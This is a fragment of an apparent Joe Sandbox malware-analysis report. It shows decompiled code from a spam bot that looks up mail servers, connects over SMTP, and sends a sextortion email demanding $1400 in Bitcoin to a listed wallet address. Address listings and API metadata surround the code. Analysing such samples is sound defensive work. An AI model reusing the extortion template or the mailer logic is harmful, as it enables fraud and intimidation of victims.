                                                                                                                                                                                                                                                                                    																__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    																if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																	__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																	if(E00EA1120( *(__ebp - 0x1c), "Mime-Version: 1.0\r\n", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                                    																		__eax = E00EA1120( *(__ebp - 0x1c), "Content-type: text/plain;\r\n\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    																		if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = memset(__ebp - 0x610, 0, 0x104);
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			strcpy(__ebp - 0x610, "Hello there!\r\n\r\n") = strcat(__ebp - 0x610, "Unfortunately, there are some bad news for you.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = strcat(__ebp - 0x610, "Some time ago your device was infected with my private trojan, R.A.T (Remote Administration Tool), if you want to find out more about it simply use Google.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = strcat(__ebp - 0x610, "You truly enjoy checking out porn websites and watching dirty videos, while having a lot of kinky fun.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = strcat(__ebp - 0x610, "All you need is $1400 USD in Bitcoin (BTC) transfer to my account (Bitcoin equivalent based on exchange rate during your transfer).\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			strcat(__ebp - 0x610, "After the transaction is successful, I will proceed to delete everything without delay.\r\n\r\n") =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																			__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x610, 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    																			if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				memset(__ebp - 0x610, 0, 0x104) = strcpy(__ebp - 0x610, "Afterwards, we can pretend that we have never met before.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ebp - 0x610 = strcat(__ebp - 0x610, "In addition, I assure you that all the harmful software will be deleted from your device.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				__ebp - 0x610 = strcat(__ebp - 0x610, "My Bitcoin (BTC) address is: 1EJJoUCykyZT3FtxRGSpuUsiBxCiHQ4wqX\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				__ebp - 0x610 = strcat(__ebp - 0x610, "Everything will be carried out based on fairness!\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				strcat(__ebp - 0x610, "An advice from me - regularly change all your passwords to your accounts and update your device with newest security patches.\r\n.\r\n") =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																				if(E00EA1120( *(__ebp - 0x1c), __ebp - 0x610, 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                                    																					 *(__ebp - 0x20) = 7;
                                                                                                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                                                                                                    																					 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                                                                                                    																				 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																			}
                                                                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                                                                    																			 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                                                                    																		 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                                                                    																	 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                                                                    																 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                                                                    															 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                                                                    														 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                                                    													 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 6:
                                                                                                                                                                                                                                                                                    										goto L0;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L49:
                                                                                                                                                                                                                                                                                    					 *(_t192 - 8) = 0 |  *(_t192 - 0x20) == 0x00000008;
                                                                                                                                                                                                                                                                                    					__imp__#22( *((intOrPtr*)(_t192 - 0x1c)), 2); // executed
                                                                                                                                                                                                                                                                                    					__imp__#3( *((intOrPtr*)(_t192 - 0x1c)));
                                                                                                                                                                                                                                                                                    					return  *(_t192 - 8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    0x00ea21f2
                                                                                                                                                                                                                                                                                    0x00ea21f2
                                                                                                                                                                                                                                                                                    0x00ea21f2
                                                                                                                                                                                                                                                                                    0x00ea21fd
                                                                                                                                                                                                                                                                                    0x00ea2202
                                                                                                                                                                                                                                                                                    0x00ea2205
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea220c
                                                                                                                                                                                                                                                                                    0x00ea1ab4
                                                                                                                                                                                                                                                                                    0x00ea1ab9
                                                                                                                                                                                                                                                                                    0x00ea1abc
                                                                                                                                                                                                                                                                                    0x00ea1ac9
                                                                                                                                                                                                                                                                                    0x00ea1ad0
                                                                                                                                                                                                                                                                                    0x00ea1ad6
                                                                                                                                                                                                                                                                                    0x00ea1ae5
                                                                                                                                                                                                                                                                                    0x00ea1aea
                                                                                                                                                                                                                                                                                    0x00ea1aef
                                                                                                                                                                                                                                                                                    0x00ea1af6
                                                                                                                                                                                                                                                                                    0x00ea1af9
                                                                                                                                                                                                                                                                                    0x00ea1b08
                                                                                                                                                                                                                                                                                    0x00ea1b15
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1b1b
                                                                                                                                                                                                                                                                                    0x00ea1b21
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1b28
                                                                                                                                                                                                                                                                                    0x00ea1b28
                                                                                                                                                                                                                                                                                    0x00ea1b3c
                                                                                                                                                                                                                                                                                    0x00ea1b71
                                                                                                                                                                                                                                                                                    0x00ea1b77
                                                                                                                                                                                                                                                                                    0x00ea1b7a
                                                                                                                                                                                                                                                                                    0x00ea1b3e
                                                                                                                                                                                                                                                                                    0x00ea1b4f
                                                                                                                                                                                                                                                                                    0x00ea1b55
                                                                                                                                                                                                                                                                                    0x00ea1b58
                                                                                                                                                                                                                                                                                    0x00ea1b58
                                                                                                                                                                                                                                                                                    0x00ea1b92
                                                                                                                                                                                                                                                                                    0x00ea1b97
                                                                                                                                                                                                                                                                                    0x00ea1b9c
                                                                                                                                                                                                                                                                                    0x00ea1baa
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1bb6
                                                                                                                                                                                                                                                                                    0x00ea1bb6
                                                                                                                                                                                                                                                                                    0x00ea1bbf
                                                                                                                                                                                                                                                                                    0x00ea1bc6
                                                                                                                                                                                                                                                                                    0x00ea1bcc
                                                                                                                                                                                                                                                                                    0x00ea1bdb
                                                                                                                                                                                                                                                                                    0x00ea1be2
                                                                                                                                                                                                                                                                                    0x00ea1be8
                                                                                                                                                                                                                                                                                    0x00ea1beb
                                                                                                                                                                                                                                                                                    0x00ea1bf1
                                                                                                                                                                                                                                                                                    0x00ea1bff
                                                                                                                                                                                                                                                                                    0x00ea1c03
                                                                                                                                                                                                                                                                                    0x00ea1c0d
                                                                                                                                                                                                                                                                                    0x00ea1c1b
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1c27
                                                                                                                                                                                                                                                                                    0x00ea1c27
                                                                                                                                                                                                                                                                                    0x00ea1c37
                                                                                                                                                                                                                                                                                    0x00ea1c3d
                                                                                                                                                                                                                                                                                    0x00ea1c40
                                                                                                                                                                                                                                                                                    0x00ea1c46
                                                                                                                                                                                                                                                                                    0x00ea1c4d
                                                                                                                                                                                                                                                                                    0x00ea1c58
                                                                                                                                                                                                                                                                                    0x00ea1c62
                                                                                                                                                                                                                                                                                    0x00ea1c70
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1c7c
                                                                                                                                                                                                                                                                                    0x00ea1c83
                                                                                                                                                                                                                                                                                    0x00ea1c87
                                                                                                                                                                                                                                                                                    0x00ea1c91
                                                                                                                                                                                                                                                                                    0x00ea1c9f
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1cab
                                                                                                                                                                                                                                                                                    0x00ea1cab
                                                                                                                                                                                                                                                                                    0x00ea1cc9
                                                                                                                                                                                                                                                                                    0x00ea1ccf
                                                                                                                                                                                                                                                                                    0x00ea1cdd
                                                                                                                                                                                                                                                                                    0x00ea1cea
                                                                                                                                                                                                                                                                                    0x00ea1cf2
                                                                                                                                                                                                                                                                                    0x00ea1cfb
                                                                                                                                                                                                                                                                                    0x00ea1d0a
                                                                                                                                                                                                                                                                                    0x00ea1d11
                                                                                                                                                                                                                                                                                    0x00ea1d16
                                                                                                                                                                                                                                                                                    0x00ea1d17
                                                                                                                                                                                                                                                                                    0x00ea1d1c
                                                                                                                                                                                                                                                                                    0x00ea1d1c
                                                                                                                                                                                                                                                                                    0x00ea1d22
                                                                                                                                                                                                                                                                                    0x00ea1d27
                                                                                                                                                                                                                                                                                    0x00ea1d28
                                                                                                                                                                                                                                                                                    0x00ea1d2d
                                                                                                                                                                                                                                                                                    0x00ea1d2d
                                                                                                                                                                                                                                                                                    0x00ea1d33
                                                                                                                                                                                                                                                                                    0x00ea1d38
                                                                                                                                                                                                                                                                                    0x00ea1d39
                                                                                                                                                                                                                                                                                    0x00ea1d3e
                                                                                                                                                                                                                                                                                    0x00ea1d3e
                                                                                                                                                                                                                                                                                    0x00ea1d44
                                                                                                                                                                                                                                                                                    0x00ea1d49
                                                                                                                                                                                                                                                                                    0x00ea1d4a
                                                                                                                                                                                                                                                                                    0x00ea1d4f
                                                                                                                                                                                                                                                                                    0x00ea1d6c
                                                                                                                                                                                                                                                                                    0x00ea1d73
                                                                                                                                                                                                                                                                                    0x00ea1d79
                                                                                                                                                                                                                                                                                    0x00ea1d7c
                                                                                                                                                                                                                                                                                    0x00ea1d82
                                                                                                                                                                                                                                                                                    0x00ea1d90
                                                                                                                                                                                                                                                                                    0x00ea1d94
                                                                                                                                                                                                                                                                                    0x00ea1d9e
                                                                                                                                                                                                                                                                                    0x00ea1dac
                                                                                                                                                                                                                                                                                    0x00ea1dc5
                                                                                                                                                                                                                                                                                    0x00ea1dce
                                                                                                                                                                                                                                                                                    0x00ea1ddc
                                                                                                                                                                                                                                                                                    0x00ea1de3
                                                                                                                                                                                                                                                                                    0x00ea1de9
                                                                                                                                                                                                                                                                                    0x00ea1dec
                                                                                                                                                                                                                                                                                    0x00ea1df9
                                                                                                                                                                                                                                                                                    0x00ea1e00
                                                                                                                                                                                                                                                                                    0x00ea1e04
                                                                                                                                                                                                                                                                                    0x00ea1e0e
                                                                                                                                                                                                                                                                                    0x00ea1e25
                                                                                                                                                                                                                                                                                    0x00ea1e2c
                                                                                                                                                                                                                                                                                    0x00ea1e32
                                                                                                                                                                                                                                                                                    0x00ea1e35
                                                                                                                                                                                                                                                                                    0x00ea1e3b
                                                                                                                                                                                                                                                                                    0x00ea1e49
                                                                                                                                                                                                                                                                                    0x00ea1e4d
                                                                                                                                                                                                                                                                                    0x00ea1e57
                                                                                                                                                                                                                                                                                    0x00ea1e65
                                                                                                                                                                                                                                                                                    0x00ea1e75
                                                                                                                                                                                                                                                                                    0x00ea1e7b
                                                                                                                                                                                                                                                                                    0x00ea1e7e
                                                                                                                                                                                                                                                                                    0x00ea1e84
                                                                                                                                                                                                                                                                                    0x00ea1e8b
                                                                                                                                                                                                                                                                                    0x00ea1ea0
                                                                                                                                                                                                                                                                                    0x00ea1eb8
                                                                                                                                                                                                                                                                                    0x00ea1ebf
                                                                                                                                                                                                                                                                                    0x00ea1ec5
                                                                                                                                                                                                                                                                                    0x00ea1ec8
                                                                                                                                                                                                                                                                                    0x00ea1ece
                                                                                                                                                                                                                                                                                    0x00ea1edc
                                                                                                                                                                                                                                                                                    0x00ea1ee0
                                                                                                                                                                                                                                                                                    0x00ea1eea
                                                                                                                                                                                                                                                                                    0x00ea1ef8
                                                                                                                                                                                                                                                                                    0x00ea1f0b
                                                                                                                                                                                                                                                                                    0x00ea1f11
                                                                                                                                                                                                                                                                                    0x00ea1f14
                                                                                                                                                                                                                                                                                    0x00ea1f1a
                                                                                                                                                                                                                                                                                    0x00ea1f21
                                                                                                                                                                                                                                                                                    0x00ea1f2c
                                                                                                                                                                                                                                                                                    0x00ea1f36
                                                                                                                                                                                                                                                                                    0x00ea1f44
                                                                                                                                                                                                                                                                                    0x00ea1f4b
                                                                                                                                                                                                                                                                                    0x00ea1f66
                                                                                                                                                                                                                                                                                    0x00ea1f74
                                                                                                                                                                                                                                                                                    0x00ea1f7b
                                                                                                                                                                                                                                                                                    0x00ea1f81
                                                                                                                                                                                                                                                                                    0x00ea1f84
                                                                                                                                                                                                                                                                                    0x00ea1f8a
                                                                                                                                                                                                                                                                                    0x00ea1f98
                                                                                                                                                                                                                                                                                    0x00ea1f9c
                                                                                                                                                                                                                                                                                    0x00ea1fa6
                                                                                                                                                                                                                                                                                    0x00ea1fbb
                                                                                                                                                                                                                                                                                    0x00ea1fc9
                                                                                                                                                                                                                                                                                    0x00ea1fe2
                                                                                                                                                                                                                                                                                    0x00ea1fec
                                                                                                                                                                                                                                                                                    0x00ea2008
                                                                                                                                                                                                                                                                                    0x00ea2015
                                                                                                                                                                                                                                                                                    0x00ea2030
                                                                                                                                                                                                                                                                                    0x00ea2044
                                                                                                                                                                                                                                                                                    0x00ea2051
                                                                                                                                                                                                                                                                                    0x00ea2080
                                                                                                                                                                                                                                                                                    0x00ea208d
                                                                                                                                                                                                                                                                                    0x00ea20bc
                                                                                                                                                                                                                                                                                    0x00ea20c9
                                                                                                                                                                                                                                                                                    0x00ea20e1
                                                                                                                                                                                                                                                                                    0x00ea20e5
                                                                                                                                                                                                                                                                                    0x00ea20ef
                                                                                                                                                                                                                                                                                    0x00ea2104
                                                                                                                                                                                                                                                                                    0x00ea211f
                                                                                                                                                                                                                                                                                    0x00ea2133
                                                                                                                                                                                                                                                                                    0x00ea2140
                                                                                                                                                                                                                                                                                    0x00ea216f
                                                                                                                                                                                                                                                                                    0x00ea217c
                                                                                                                                                                                                                                                                                    0x00ea21ab
                                                                                                                                                                                                                                                                                    0x00ea21b8
                                                                                                                                                                                                                                                                                    0x00ea21d0
                                                                                                                                                                                                                                                                                    0x00ea21de
                                                                                                                                                                                                                                                                                    0x00ea21e9
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1af1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1af1
                                                                                                                                                                                                                                                                                    0x00ea1acb
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1acb
                                                                                                                                                                                                                                                                                    0x00ea1ac9
                                                                                                                                                                                                                                                                                    0x00ea2211
                                                                                                                                                                                                                                                                                    0x00ea221a
                                                                                                                                                                                                                                                                                    0x00ea2223
                                                                                                                                                                                                                                                                                    0x00ea222d
                                                                                                                                                                                                                                                                                    0x00ea2239
                                                                                                                                                                                                                                                                                    0x00ea2239

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1120: lstrlenA.KERNEL32(?), ref: 00EA112D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1120: send.WS2_32(?,?,000000FF,00000000), ref: 00EA1144
                                                                                                                                                                                                                                                                                    • shutdown.WS2_32(000000FF,00000002), ref: 00EA2223
                                                                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 00EA222D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: closesocketlstrlensendshutdown
                                                                                                                                                                                                                                                                                    • String ID: QUIT
                                                                                                                                                                                                                                                                                    • API String ID: 317823648-1967077921
                                                                                                                                                                                                                                                                                    • Opcode ID: be3acd6b963453a0daf2d56c2a38def1df88a48f8d233122c480e0f693bacc8b
                                                                                                                                                                                                                                                                                    • Instruction ID: 5d2e75b869dc45a0ccd37f37b0658e4b54b103a05757d2023f3aedc342be6ad3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be3acd6b963453a0daf2d56c2a38def1df88a48f8d233122c480e0f693bacc8b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50016DB5D00218EFCF10CBA4DC49BEDB7B4BF9E305F0052A8E6157A291D7786584CB24
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 328 ea16e0-ea16f9 call ea1440 331 ea16fb-ea16fe 328->331 332 ea1700-ea1731 htons socket 328->332 333 ea175b-ea175e 331->333 334 ea173a-ea174d connect 332->334 335 ea1733-ea1738 332->335 336 ea1758 334->336 337 ea174f-ea1754 334->337 335->333 336->333 337->333
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1440: inet_addr.WS2_32(00EA10D9), ref: 00EA144A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1440: gethostbyname.WS2_32(?), ref: 00EA145D
                                                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 00EA1714
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00EA1724
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: gethostbynamehtonsinet_addrsocket
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 230923099-0
                                                                                                                                                                                                                                                                                    • Opcode ID: fd4f8588c67d3abd1026f561888da477efdc2a82e90fee9e16394aa4ac03c843
                                                                                                                                                                                                                                                                                    • Instruction ID: 9147d673f50cf90b6bd46346a6853de3ad3600399710c25494e8c4ed8fc8fbde
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd4f8588c67d3abd1026f561888da477efdc2a82e90fee9e16394aa4ac03c843
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD015278D00208EBCB10DBB49845ABD7B75AF5F334F205395F525BB2D0E770AA419751
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                                                                                                                                                    			E00EA10A0(intOrPtr _a4, short _a8) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				char* _t16;
                                                                                                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                                                                                                    				short _t20;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                                                                    				_t16 =  &_v8;
                                                                                                                                                                                                                                                                                    				_push(_t16);
                                                                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                                                                    				_push(0xf);
                                                                                                                                                                                                                                                                                    				_push(_a4); // executed
                                                                                                                                                                                                                                                                                    				L00EA307A(); // executed
                                                                                                                                                                                                                                                                                    				if(_t16 == 0) {
                                                                                                                                                                                                                                                                                    					_t19 = E00EA1440( *((intOrPtr*)(_v8 + 0x18))); // executed
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_a8 + 4)) = _t19;
                                                                                                                                                                                                                                                                                    					if(_a8 != 0) {
                                                                                                                                                                                                                                                                                    						_t20 = _a8;
                                                                                                                                                                                                                                                                                    						 *_t20 = 2;
                                                                                                                                                                                                                                                                                    						__imp__#9(0x19);
                                                                                                                                                                                                                                                                                    						 *((short*)(_a8 + 2)) = _t20;
                                                                                                                                                                                                                                                                                    						_v12 = 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                                                                                                                    					_push(_v8); // executed
                                                                                                                                                                                                                                                                                    					L00EA3074(); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x00ea10a6
                                                                                                                                                                                                                                                                                    0x00ea10ad
                                                                                                                                                                                                                                                                                    0x00ea10b4
                                                                                                                                                                                                                                                                                    0x00ea10b6
                                                                                                                                                                                                                                                                                    0x00ea10b9
                                                                                                                                                                                                                                                                                    0x00ea10ba
                                                                                                                                                                                                                                                                                    0x00ea10bc
                                                                                                                                                                                                                                                                                    0x00ea10be
                                                                                                                                                                                                                                                                                    0x00ea10c3
                                                                                                                                                                                                                                                                                    0x00ea10c4
                                                                                                                                                                                                                                                                                    0x00ea10cb
                                                                                                                                                                                                                                                                                    0x00ea10d4
                                                                                                                                                                                                                                                                                    0x00ea10df
                                                                                                                                                                                                                                                                                    0x00ea10e6
                                                                                                                                                                                                                                                                                    0x00ea10ed
                                                                                                                                                                                                                                                                                    0x00ea10f0
                                                                                                                                                                                                                                                                                    0x00ea10f5
                                                                                                                                                                                                                                                                                    0x00ea10fe
                                                                                                                                                                                                                                                                                    0x00ea1102
                                                                                                                                                                                                                                                                                    0x00ea1102
                                                                                                                                                                                                                                                                                    0x00ea1109
                                                                                                                                                                                                                                                                                    0x00ea110e
                                                                                                                                                                                                                                                                                    0x00ea110f
                                                                                                                                                                                                                                                                                    0x00ea110f
                                                                                                                                                                                                                                                                                    0x00ea111a

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DnsQuery_A.DNSAPI(00000000,0000000F,00000000,00000000,00000000,00000000), ref: 00EA10C4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1440: inet_addr.WS2_32(00EA10D9), ref: 00EA144A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1440: gethostbyname.WS2_32(?), ref: 00EA145D
                                                                                                                                                                                                                                                                                    • htons.WS2_32(00000019), ref: 00EA10F5
                                                                                                                                                                                                                                                                                    • DnsFree.DNSAPI(00000000,00000001), ref: 00EA110F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
